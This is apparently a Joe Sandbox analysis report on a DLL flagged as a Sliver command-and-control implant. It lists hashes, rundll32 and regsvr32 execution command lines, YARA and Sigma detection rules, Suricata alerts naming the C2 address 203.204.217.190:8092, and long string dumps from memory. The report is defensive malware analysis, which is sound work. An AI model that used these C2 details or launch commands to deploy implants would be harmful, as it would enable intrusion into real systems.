Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5cPRapVOx6.dll

Overview

General Information

Sample name:5cPRapVOx6.dll
renamed because original name is a hash value
Original sample name:c994bb9982dd689598c6c261090a40cb.dll
Analysis ID:1520451
MD5:c994bb9982dd689598c6c261090a40cb
SHA1:484932042beb27bec5ab6d96df21ec1418c428a6
SHA256:fbce9fc010fdfb67da5ff95cc5a5d1dbb0c07950522f130b031e55831f81b060
Tags:dlluser-abuse_ch
Infos:

Detection

Sliver
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Sliver Implants
AI detected suspicious sample
Found Tor onion address
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential time zone aware malware
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7336 cmdline: loaddll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7456 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7480 cmdline: rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • regsvr32.exe (PID: 7472 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\5cPRapVOx6.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
    • rundll32.exe (PID: 7488 cmdline: rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7624 cmdline: rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllRegisterServer MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7664 cmdline: rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllUnregisterServer MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SliverAccording to VK9 Seecurity, Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.sliver

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
5cPRapVOx6.dllMulti_Trojan_Bishopsliver_42298c4aunknownunknown
  • 0xc7c29e:$a1: ).RequestResend
  • 0xc6b376:$a2: ).GetPrivInfo
5cPRapVOx6.dllINDICATOR_TOOL_SliverDetects Sliver implant cross-platform adversary emulation/red teamditekSHen
  • 0xa3755e:$s3: .WGTCPForwarder
  • 0xa382e0:$s3: .WGTCPForwarder
  • 0xa390cc:$s3: .WGTCPForwarder
  • 0xa3a185:$s3: .WGTCPForwarder
  • 0xa607ac:$s3: .WGTCPForwarder
  • 0xa618c0:$s3: .WGTCPForwarder
  • 0xa341d0:$s6: .BackdoorReq
  • 0xa374b0:$s7: .ProcessDumpReq
  • 0xa39789:$s8: .InvokeSpawnDllReq
  • 0xa30664:$s9: .SpawnDll
  • 0xa34322:$s9: .SpawnDll

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000003.3672650809.000000000C95C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SliverYara detected Sliver ImplantsJoe Security
    00000004.00000002.4218098729.000000000CD74000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SliverYara detected Sliver ImplantsJoe Security
      00000007.00000002.4220285645.000000000C95C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SliverYara detected Sliver ImplantsJoe Security
        00000004.00000003.3996852512.000000000CD74000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SliverYara detected Sliver ImplantsJoe Security
          00000005.00000002.4218005900.000000000CCCA000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SliverYara detected Sliver ImplantsJoe Security
            Click to see the 24 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.rundll32.exe.6be00000.0.unpackMulti_Trojan_Bishopsliver_42298c4aunknownunknown
            • 0xc7c29e:$a1: ).RequestResend
            • 0xc6b376:$a2: ).GetPrivInfo
            6.2.rundll32.exe.6be00000.0.unpackINDICATOR_TOOL_SliverDetects Sliver implant cross-platform adversary emulation/red teamditekSHen
            • 0xa3755e:$s3: .WGTCPForwarder
            • 0xa382e0:$s3: .WGTCPForwarder
            • 0xa390cc:$s3: .WGTCPForwarder
            • 0xa3a185:$s3: .WGTCPForwarder
            • 0xa607ac:$s3: .WGTCPForwarder
            • 0xa618c0:$s3: .WGTCPForwarder
            • 0xa341d0:$s6: .BackdoorReq
            • 0xa374b0:$s7: .ProcessDumpReq
            • 0xa39789:$s8: .InvokeSpawnDllReq
            • 0xa30664:$s9: .SpawnDll
            • 0xa34322:$s9: .SpawnDll
            7.2.rundll32.exe.6be00000.0.unpackMulti_Trojan_Bishopsliver_42298c4aunknownunknown
            • 0xc7c29e:$a1: ).RequestResend
            • 0xc6b376:$a2: ).GetPrivInfo
            7.2.rundll32.exe.6be00000.0.unpackINDICATOR_TOOL_SliverDetects Sliver implant cross-platform adversary emulation/red teamditekSHen
            • 0xa3755e:$s3: .WGTCPForwarder
            • 0xa382e0:$s3: .WGTCPForwarder
            • 0xa390cc:$s3: .WGTCPForwarder
            • 0xa3a185:$s3: .WGTCPForwarder
            • 0xa607ac:$s3: .WGTCPForwarder
            • 0xa618c0:$s3: .WGTCPForwarder
            • 0xa341d0:$s6: .BackdoorReq
            • 0xa374b0:$s7: .ProcessDumpReq
            • 0xa39789:$s8: .InvokeSpawnDllReq
            • 0xa30664:$s9: .SpawnDll
            • 0xa34322:$s9: .SpawnDll
            5.2.rundll32.exe.6be00000.0.unpackMulti_Trojan_Bishopsliver_42298c4aunknownunknown
            • 0xc7c29e:$a1: ).RequestResend
            • 0xc6b376:$a2: ).GetPrivInfo
            Click to see the 7 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Network Connection Initiated By Regsvr32.EXE
            Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 203.204.217.190, DestinationIsIpv6: false, DestinationPort: 8082, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 7472, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T11:20:30.598642+020028526551Malware Command and Control Activity Detected192.168.2.449746203.204.217.1908092TCP
            2024-09-27T11:20:30.688055+020028526551Malware Command and Control Activity Detected192.168.2.449747203.204.217.1908092TCP
            2024-09-27T11:20:36.250198+020028526551Malware Command and Control Activity Detected192.168.2.449752203.204.217.1908092TCP
            2024-09-27T11:22:43.596272+020028526551Malware Command and Control Activity Detected192.168.2.449772203.204.217.1908092TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: 5cPRapVOx6.dllReversingLabs: Detection: 50%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
            Machine Learning detection for sample
            Source: 5cPRapVOx6.dllJoe Sandbox ML: detected
            Source: 5cPRapVOx6.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
            Source: 5cPRapVOx6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2852655 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49747 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852652 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49770 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852658 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49768 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852654 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49754 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852655 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49746 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852657 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49764 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852655 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49752 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852653 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49748 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852658 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49750 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852653 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49763 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852653 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49767 -> 203.204.217.190:8092
            Source: Network trafficSuricata IDS: 2852655 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49772 -> 203.204.217.190:8092
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 203.204.217.190 8092Jump to behavior
            Found Tor onion address
            Source: loaddll32.exe, 00000001.00000002.4230715500.000000006C815000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: %s%v:%d&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345-0930.avif.html.jpeg.json.wasm.webp1562578125:***@:path<err><nil>AGAPEAdlamAprilBLIMPBORNEBRANTBamumBatakBuhidCROAKCall ClassDEAIRDEEDYDWORDDograEASEDECDSAEnumsErrorFLOATFalseFoundGINNYGetDCGnameGreekHTTP/IDENTINCURInputInts:IsMapJARLSuserKIANGKhmerLatinLimbuLocalLstatMEETSMOTTEMarchNRGBANamesNushuORRISOghamOneofOriyaOsageP-224P-256P-384P-521PIERSPLIESPULEDPtrs:QWORDREHABROUESROVERRangeRealmRunicSCOURSHA-1SLICKSPIFFSTermStartTREWSTakriTamilTypeAUNCLEUSTARUTF-8UnameVistaWORMS[E]: \%03o\u202allowarrayatimebad nbreakbyteschdirchmodchowncloseconstctimectypedeferenum=falsefaultfieldfilesfloatgcinggnamegroupgscanhchanhost@hostshttpsimap2imap3imapsint16int32int64json=kind=labelloginmatchmheapmkdirmonthmtimename=ndr:"no IPntohsoauthoneofpanicparsepop3sproxyrangerouterune schedsleepslicesockssse41sse42ssse3startsudogsweeptext/tls: traceuint8unameusageutf-8valueweak=writexxxxx Value%%0%dd%s: %s%s: %v%s: %w%v: %v, not , val .local.onion.proto0x%08x390625; and <-chanACARIDALIYOSARGALSASLOPEAcceptAnswerArabicAugustBIOGASBOINGSBOSQUEBasic BinaryBitBltBrahmiCANCELCHAKRACHINASCINQUECarianChakmaClosedCommonCookieCopticDREARYEMETINExpectFieldsFormatFridayGAMMEDGOAWAYGOWANSGUIROSGetACPGoTypeGothicGray16HAZANSHangulHatranHebrewHyphenINVERTIgnoreIsListIsWeakJAUKEDKITTELKaithiKhojkiLAPSUSLECTORLIERNELISTEELISTENLYRISTLengthLepchaLockedLycianLydianMARKUPMapKeyMediumMondayNumberOUTGASOneofsOutputPADDEDPAWNORPHLEGMPINEALPragmaProto2Proto3QUASARRETEAMREZERORGBA64RODENTRejangS-1-%dSENILESHAVERSHELLYSIMLINSIRUPSSKIVVYSLEIGHSOLANDSORGHOSQUALLSTREETSTRINGSURRASServerStringSundaySyntaxSyriacTETANYTODIESTWISTSTYRINGTai_LeTangutTargetTeluguThaanaTypeMXTypeNSUMBERSUNCUTEUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11UTF-16User32VASSALValuesWRACKSWanchoWeightX25519Yezidi[]byte\ufffdacceptactivechan<-closedcookiedomaindoubledriverempty exec: expectgopherhangupheaderimportinternip+netjqueryjstypekadminkilledkrbtgtlistenmethodminutenetdnsnumberoauth2objectoriginpackedpopcntproto2proto3rdtscpreadatrealmsremoverenamereturnrune1 scriptsecondselectsendtoserversetenvsigninsint32sint64socketsocks socks5statusstringstructswitchsyntaxsysmontelnettimersuint16uint32uint64unusedustar ustarvarintx86_64 %v=%v, (conn) Value> flags= len=%d using %d > %d%s - %s(%d) %s, type=-NoExit19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625::ffff::method:scheme:statusABOLLAEACCLAIMAILERONAMNESTYAPHTHAEAvestanBANNERSBANTERSBOSSISMBUSHMENBengaliBrailleCALAMUSCLOSINGCOMMENTCOMMOVECOMMUNECONNECTCULVERSCURDLESChanDirConvertCopySidCreatedCypriotDERNIERDES-CBCDefaultDeseretEDDYINGEREMURIERRANTSERUCTEDEd25519ElbasanElymaicExpiresFOCUSERFRISEESFloats:FreeSidGODEBUGGOOMBAHGranthaHAMMINGHARDIERHAUNTERHEADERSHEEDINGHETAIRAHIRSLESHURTLESHanunooILLEGALIM UsedINDOWEDIO waitImportsInstAltInstNopJANGLEDJOYPOPSJanuaryKARATESKEBBIESKECKINGKELSONSKOLKHOZKannadaLACTAMSLATENEDLEADMENLOWBOYSMAIHEMSMAMMETSMARCHESMARMITEMD2-RSAMD5-RSAMUCLUCSMUI_DltMUI_StdMURRIESMakasarMan
            Source: regsvr32.exe, 00000004.00000002.4229586587.000000006C815000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: %s%v:%d&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345-0930.avif.html.jpeg.json.wasm.webp1562578125:***@:path<err><nil>AGAPEAdlamAprilBLIMPBORNEBRANTBamumBatakBuhidCROAKCall ClassDEAIRDEEDYDWORDDograEASEDECDSAEnumsErrorFLOATFalseFoundGINNYGetDCGnameGreekHTTP/IDENTINCURInputInts:IsMapJARLSuserKIANGKhmerLatinLimbuLocalLstatMEETSMOTTEMarchNRGBANamesNushuORRISOghamOneofOriyaOsageP-224P-256P-384P-521PIERSPLIESPULEDPtrs:QWORDREHABROUESROVERRangeRealmRunicSCOURSHA-1SLICKSPIFFSTermStartTREWSTakriTamilTypeAUNCLEUSTARUTF-8UnameVistaWORMS[E]: \%03o\u202allowarrayatimebad nbreakbyteschdirchmodchowncloseconstctimectypedeferenum=falsefaultfieldfilesfloatgcinggnamegroupgscanhchanhost@hostshttpsimap2imap3imapsint16int32int64json=kind=labelloginmatchmheapmkdirmonthmtimename=ndr:"no IPntohsoauthoneofpanicparsepop3sproxyrangerouterune schedsleepslicesockssse41sse42ssse3startsudogsweeptext/tls: traceuint8unameusageutf-8valueweak=writexxxxx Value%%0%dd%s: %s%s: %v%s: %w%v: %v, not , val .local.onion.proto0x%08x390625; and <-chanACARIDALIYOSARGALSASLOPEAcceptAnswerArabicAugustBIOGASBOINGSBOSQUEBasic BinaryBitBltBrahmiCANCELCHAKRACHINASCINQUECarianChakmaClosedCommonCookieCopticDREARYEMETINExpectFieldsFormatFridayGAMMEDGOAWAYGOWANSGUIROSGetACPGoTypeGothicGray16HAZANSHangulHatranHebrewHyphenINVERTIgnoreIsListIsWeakJAUKEDKITTELKaithiKhojkiLAPSUSLECTORLIERNELISTEELISTENLYRISTLengthLepchaLockedLycianLydianMARKUPMapKeyMediumMondayNumberOUTGASOneofsOutputPADDEDPAWNORPHLEGMPINEALPragmaProto2Proto3QUASARRETEAMREZERORGBA64RODENTRejangS-1-%dSENILESHAVERSHELLYSIMLINSIRUPSSKIVVYSLEIGHSOLANDSORGHOSQUALLSTREETSTRINGSURRASServerStringSundaySyntaxSyriacTETANYTODIESTWISTSTYRINGTai_LeTangutTargetTeluguThaanaTypeMXTypeNSUMBERSUNCUTEUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11UTF-16User32VASSALValuesWRACKSWanchoWeightX25519Yezidi[]byte\ufffdacceptactivechan<-closedcookiedomaindoubledriverempty exec: expectgopherhangupheaderimportinternip+netjqueryjstypekadminkilledkrbtgtlistenmethodminutenetdnsnumberoauth2objectoriginpackedpopcntproto2proto3rdtscpreadatrealmsremoverenamereturnrune1 scriptsecondselectsendtoserversetenvsigninsint32sint64socketsocks socks5statusstringstructswitchsyntaxsysmontelnettimersuint16uint32uint64unusedustar ustarvarintx86_64 %v=%v, (conn) Value> flags= len=%d using %d > %d%s - %s(%d) %s, type=-NoExit19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625::ffff::method:scheme:statusABOLLAEACCLAIMAILERONAMNESTYAPHTHAEAvestanBANNERSBANTERSBOSSISMBUSHMENBengaliBrailleCALAMUSCLOSINGCOMMENTCOMMOVECOMMUNECONNECTCULVERSCURDLESChanDirConvertCopySidCreatedCypriotDERNIERDES-CBCDefaultDeseretEDDYINGEREMURIERRANTSERUCTEDEd25519ElbasanElymaicExpiresFOCUSERFRISEESFloats:FreeSidGODEBUGGOOMBAHGranthaHAMMINGHARDIERHAUNTERHEADERSHEEDINGHETAIRAHIRSLESHURTLESHanunooILLEGALIM UsedINDOWEDIO waitImportsInstAltInstNopJANGLEDJOYPOPSJanuaryKARATESKEBBIESKECKINGKELSONSKOLKHOZKannadaLACTAMSLATENEDLEADMENLOWBOYSMAIHEMSMAMMETSMARCHESMARMITEMD2-RSAMD5-RSAMUCLUCSMUI_DltMUI_StdMURRIESMakasarMan
            Source: rundll32.exe, 00000005.00000002.4230484560.000000006C815000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: %s%v:%d&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345-0930.avif.html.jpeg.json.wasm.webp1562578125:***@:path<err><nil>AGAPEAdlamAprilBLIMPBORNEBRANTBamumBatakBuhidCROAKCall ClassDEAIRDEEDYDWORDDograEASEDECDSAEnumsErrorFLOATFalseFoundGINNYGetDCGnameGreekHTTP/IDENTINCURInputInts:IsMapJARLSuserKIANGKhmerLatinLimbuLocalLstatMEETSMOTTEMarchNRGBANamesNushuORRISOghamOneofOriyaOsageP-224P-256P-384P-521PIERSPLIESPULEDPtrs:QWORDREHABROUESROVERRangeRealmRunicSCOURSHA-1SLICKSPIFFSTermStartTREWSTakriTamilTypeAUNCLEUSTARUTF-8UnameVistaWORMS[E]: \%03o\u202allowarrayatimebad nbreakbyteschdirchmodchowncloseconstctimectypedeferenum=falsefaultfieldfilesfloatgcinggnamegroupgscanhchanhost@hostshttpsimap2imap3imapsint16int32int64json=kind=labelloginmatchmheapmkdirmonthmtimename=ndr:"no IPntohsoauthoneofpanicparsepop3sproxyrangerouterune schedsleepslicesockssse41sse42ssse3startsudogsweeptext/tls: traceuint8unameusageutf-8valueweak=writexxxxx Value%%0%dd%s: %s%s: %v%s: %w%v: %v, not , val .local.onion.proto0x%08x390625; and <-chanACARIDALIYOSARGALSASLOPEAcceptAnswerArabicAugustBIOGASBOINGSBOSQUEBasic BinaryBitBltBrahmiCANCELCHAKRACHINASCINQUECarianChakmaClosedCommonCookieCopticDREARYEMETINExpectFieldsFormatFridayGAMMEDGOAWAYGOWANSGUIROSGetACPGoTypeGothicGray16HAZANSHangulHatranHebrewHyphenINVERTIgnoreIsListIsWeakJAUKEDKITTELKaithiKhojkiLAPSUSLECTORLIERNELISTEELISTENLYRISTLengthLepchaLockedLycianLydianMARKUPMapKeyMediumMondayNumberOUTGASOneofsOutputPADDEDPAWNORPHLEGMPINEALPragmaProto2Proto3QUASARRETEAMREZERORGBA64RODENTRejangS-1-%dSENILESHAVERSHELLYSIMLINSIRUPSSKIVVYSLEIGHSOLANDSORGHOSQUALLSTREETSTRINGSURRASServerStringSundaySyntaxSyriacTETANYTODIESTWISTSTYRINGTai_LeTangutTargetTeluguThaanaTypeMXTypeNSUMBERSUNCUTEUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11UTF-16User32VASSALValuesWRACKSWanchoWeightX25519Yezidi[]byte\ufffdacceptactivechan<-closedcookiedomaindoubledriverempty exec: expectgopherhangupheaderimportinternip+netjqueryjstypekadminkilledkrbtgtlistenmethodminutenetdnsnumberoauth2objectoriginpackedpopcntproto2proto3rdtscpreadatrealmsremoverenamereturnrune1 scriptsecondselectsendtoserversetenvsigninsint32sint64socketsocks socks5statusstringstructswitchsyntaxsysmontelnettimersuint16uint32uint64unusedustar ustarvarintx86_64 %v=%v, (conn) Value> flags= len=%d using %d > %d%s - %s(%d) %s, type=-NoExit19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625::ffff::method:scheme:statusABOLLAEACCLAIMAILERONAMNESTYAPHTHAEAvestanBANNERSBANTERSBOSSISMBUSHMENBengaliBrailleCALAMUSCLOSINGCOMMENTCOMMOVECOMMUNECONNECTCULVERSCURDLESChanDirConvertCopySidCreatedCypriotDERNIERDES-CBCDefaultDeseretEDDYINGEREMURIERRANTSERUCTEDEd25519ElbasanElymaicExpiresFOCUSERFRISEESFloats:FreeSidGODEBUGGOOMBAHGranthaHAMMINGHARDIERHAUNTERHEADERSHEEDINGHETAIRAHIRSLESHURTLESHanunooILLEGALIM UsedINDOWEDIO waitImportsInstAltInstNopJANGLEDJOYPOPSJanuaryKARATESKEBBIESKECKINGKELSONSKOLKHOZKannadaLACTAMSLATENEDLEADMENLOWBOYSMAIHEMSMAMMETSMARCHESMARMITEMD2-RSAMD5-RSAMUCLUCSMUI_DltMUI_StdMURRIESMakasarMan
            Source: rundll32.exe, 00000006.00000002.4229493462.000000006C815000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: %s%v:%d&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345-0930.avif.html.jpeg.json.wasm.webp1562578125:***@:path<err><nil>AGAPEAdlamAprilBLIMPBORNEBRANTBamumBatakBuhidCROAKCall ClassDEAIRDEEDYDWORDDograEASEDECDSAEnumsErrorFLOATFalseFoundGINNYGetDCGnameGreekHTTP/IDENTINCURInputInts:IsMapJARLSuserKIANGKhmerLatinLimbuLocalLstatMEETSMOTTEMarchNRGBANamesNushuORRISOghamOneofOriyaOsageP-224P-256P-384P-521PIERSPLIESPULEDPtrs:QWORDREHABROUESROVERRangeRealmRunicSCOURSHA-1SLICKSPIFFSTermStartTREWSTakriTamilTypeAUNCLEUSTARUTF-8UnameVistaWORMS[E]: \%03o\u202allowarrayatimebad nbreakbyteschdirchmodchowncloseconstctimectypedeferenum=falsefaultfieldfilesfloatgcinggnamegroupgscanhchanhost@hostshttpsimap2imap3imapsint16int32int64json=kind=labelloginmatchmheapmkdirmonthmtimename=ndr:"no IPntohsoauthoneofpanicparsepop3sproxyrangerouterune schedsleepslicesockssse41sse42ssse3startsudogsweeptext/tls: traceuint8unameusageutf-8valueweak=writexxxxx Value%%0%dd%s: %s%s: %v%s: %w%v: %v, not , val .local.onion.proto0x%08x390625; and <-chanACARIDALIYOSARGALSASLOPEAcceptAnswerArabicAugustBIOGASBOINGSBOSQUEBasic BinaryBitBltBrahmiCANCELCHAKRACHINASCINQUECarianChakmaClosedCommonCookieCopticDREARYEMETINExpectFieldsFormatFridayGAMMEDGOAWAYGOWANSGUIROSGetACPGoTypeGothicGray16HAZANSHangulHatranHebrewHyphenINVERTIgnoreIsListIsWeakJAUKEDKITTELKaithiKhojkiLAPSUSLECTORLIERNELISTEELISTENLYRISTLengthLepchaLockedLycianLydianMARKUPMapKeyMediumMondayNumberOUTGASOneofsOutputPADDEDPAWNORPHLEGMPINEALPragmaProto2Proto3QUASARRETEAMREZERORGBA64RODENTRejangS-1-%dSENILESHAVERSHELLYSIMLINSIRUPSSKIVVYSLEIGHSOLANDSORGHOSQUALLSTREETSTRINGSURRASServerStringSundaySyntaxSyriacTETANYTODIESTWISTSTYRINGTai_LeTangutTargetTeluguThaanaTypeMXTypeNSUMBERSUNCUTEUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11UTF-16User32VASSALValuesWRACKSWanchoWeightX25519Yezidi[]byte\ufffdacceptactivechan<-closedcookiedomaindoubledriverempty exec: expectgopherhangupheaderimportinternip+netjqueryjstypekadminkilledkrbtgtlistenmethodminutenetdnsnumberoauth2objectoriginpackedpopcntproto2proto3rdtscpreadatrealmsremoverenamereturnrune1 scriptsecondselectsendtoserversetenvsigninsint32sint64socketsocks socks5statusstringstructswitchsyntaxsysmontelnettimersuint16uint32uint64unusedustar ustarvarintx86_64 %v=%v, (conn) Value> flags= len=%d using %d > %d%s - %s(%d) %s, type=-NoExit19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625::ffff::method:scheme:statusABOLLAEACCLAIMAILERONAMNESTYAPHTHAEAvestanBANNERSBANTERSBOSSISMBUSHMENBengaliBrailleCALAMUSCLOSINGCOMMENTCOMMOVECOMMUNECONNECTCULVERSCURDLESChanDirConvertCopySidCreatedCypriotDERNIERDES-CBCDefaultDeseretEDDYINGEREMURIERRANTSERUCTEDEd25519ElbasanElymaicExpiresFOCUSERFRISEESFloats:FreeSidGODEBUGGOOMBAHGranthaHAMMINGHARDIERHAUNTERHEADERSHEEDINGHETAIRAHIRSLESHURTLESHanunooILLEGALIM UsedINDOWEDIO waitImportsInstAltInstNopJANGLEDJOYPOPSJanuaryKARATESKEBBIESKECKINGKELSONSKOLKHOZKannadaLACTAMSLATENEDLEADMENLOWBOYSMAIHEMSMAMMETSMARCHESMARMITEMD2-RSAMD5-RSAMUCLUCSMUI_DltMUI_StdMURRIESMakasarMan
            Source: rundll32.exe, 00000007.00000002.4229872481.000000006C815000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: %s%v:%d&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345-0930.avif.html.jpeg.json.wasm.webp1562578125:***@:path<err><nil>AGAPEAdlamAprilBLIMPBORNEBRANTBamumBatakBuhidCROAKCall ClassDEAIRDEEDYDWORDDograEASEDECDSAEnumsErrorFLOATFalseFoundGINNYGetDCGnameGreekHTTP/IDENTINCURInputInts:IsMapJARLSuserKIANGKhmerLatinLimbuLocalLstatMEETSMOTTEMarchNRGBANamesNushuORRISOghamOneofOriyaOsageP-224P-256P-384P-521PIERSPLIESPULEDPtrs:QWORDREHABROUESROVERRangeRealmRunicSCOURSHA-1SLICKSPIFFSTermStartTREWSTakriTamilTypeAUNCLEUSTARUTF-8UnameVistaWORMS[E]: \%03o\u202allowarrayatimebad nbreakbyteschdirchmodchowncloseconstctimectypedeferenum=falsefaultfieldfilesfloatgcinggnamegroupgscanhchanhost@hostshttpsimap2imap3imapsint16int32int64json=kind=labelloginmatchmheapmkdirmonthmtimename=ndr:"no IPntohsoauthoneofpanicparsepop3sproxyrangerouterune schedsleepslicesockssse41sse42ssse3startsudogsweeptext/tls: traceuint8unameusageutf-8valueweak=writexxxxx Value%%0%dd%s: %s%s: %v%s: %w%v: %v, not , val .local.onion.proto0x%08x390625; and <-chanACARIDALIYOSARGALSASLOPEAcceptAnswerArabicAugustBIOGASBOINGSBOSQUEBasic BinaryBitBltBrahmiCANCELCHAKRACHINASCINQUECarianChakmaClosedCommonCookieCopticDREARYEMETINExpectFieldsFormatFridayGAMMEDGOAWAYGOWANSGUIROSGetACPGoTypeGothicGray16HAZANSHangulHatranHebrewHyphenINVERTIgnoreIsListIsWeakJAUKEDKITTELKaithiKhojkiLAPSUSLECTORLIERNELISTEELISTENLYRISTLengthLepchaLockedLycianLydianMARKUPMapKeyMediumMondayNumberOUTGASOneofsOutputPADDEDPAWNORPHLEGMPINEALPragmaProto2Proto3QUASARRETEAMREZERORGBA64RODENTRejangS-1-%dSENILESHAVERSHELLYSIMLINSIRUPSSKIVVYSLEIGHSOLANDSORGHOSQUALLSTREETSTRINGSURRASServerStringSundaySyntaxSyriacTETANYTODIESTWISTSTYRINGTai_LeTangutTargetTeluguThaanaTypeMXTypeNSUMBERSUNCUTEUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11UTF-16User32VASSALValuesWRACKSWanchoWeightX25519Yezidi[]byte\ufffdacceptactivechan<-closedcookiedomaindoubledriverempty exec: expectgopherhangupheaderimportinternip+netjqueryjstypekadminkilledkrbtgtlistenmethodminutenetdnsnumberoauth2objectoriginpackedpopcntproto2proto3rdtscpreadatrealmsremoverenamereturnrune1 